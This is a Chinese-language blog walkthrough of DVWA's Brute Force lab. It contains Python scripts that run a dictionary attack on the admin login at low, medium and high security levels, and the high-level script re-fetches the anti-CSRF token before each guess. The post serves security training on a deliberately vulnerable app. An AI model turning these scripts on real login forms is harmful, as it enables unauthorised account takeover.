DVWA - Brute Force (low, medium, high)
2017-01-05 22:08
441 查看
low
遍历字典(成功的前提是字典里有这个密码)import requests import re def main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php' headers = { 'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=low' } h = open('pwd.txt') line = h.readline() while line: password = line.strip() new_url = url + '?username=admin&password=' + password + '&Login=Login' res = requests.get(new_url, headers=headers) if 'Username and/or password incorrect.' in res.content: print('Test %s: No' % password) else: print('Test %s: Yes' % password) break line = h.readline() if __name__ == '__main__': main()
结果
Test 123456: No Test admin: No Test password: Yes [Finished in 0.3s]
medium
查看源码发现sleep( 2 );
测试不成功时会延时2s,方法和low一样,只是慢一些,需要更新cookie中的安全等级security。
headers = { 'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=medium' }
high
查看源码发现<input type="hidden" name="user_token" value="2fe55c6b0091776e6f46283d41854b41">
// Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
多一个字段,测试后可发现user_token字段的值是动态的,思路即是在代码层面动态获该字段的值,再发测试密码的请求。
import requests import re def main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php' headers = { 'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=high' } h = open('pwd.txt') line = h.readline() while line: password = line.strip() res = requests.get(url, headers=headers) m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S) if m: user_token = m.group(1) new_url = url + '?username=admin&password=' + password + '&user_token=' + user_token + '&Login=Login' res = requests.get(new_url, headers=headers) if 'Username and/or password incorrect.' in res.content: print('Test %s: No' % password) else: print('Test %s: Yes' % password) break line = h.readline() if __name__ == '__main__': main()
相关文章推荐
- DVWA - XSS (Stored) (low, medium, high)
- DVWA - Command Injection (low, medium, high)
- DVWA - CSRF (low, medium, high)
- DVWA - File Inclusion (low, medium, high)
- DVWA - File Upload (low, medium, high)
- DVWA - SQL Injection (low, medium, high)
- DVWA - XSS (Reflected) (low, medium, high)
- Codeforces Round #437 (Div. 2 E. Buy Low Sell High 先买后卖 贪心
- FRM-92095: Oracle Jnitiator version too low – please install version 1.1.8.2 or highe
- D - Buy Low Sell High(multiset)
- IPC low/medium/high density 什么意思?
- Low-level Thinking in High-level Shading Languages
- SQLmap注入学习实战 —— dvwa 从low到impossble
- J-LINK突然不能下载(错误:JLink Warning: RESET (pin 15) high, but should be low. Please check target)
- high与low
- 第五周-3low or high
- Software by Numbers: Low-Risk, High-Return Development
- Codeforces Round #437 (Div. 2 E. Buy Low Sell High 先买后卖 贪心
- [USACO15DEC]高低卡(白金)High Card Low Card (Platinum)
- Kafka:High level consumer vs. Low level consumer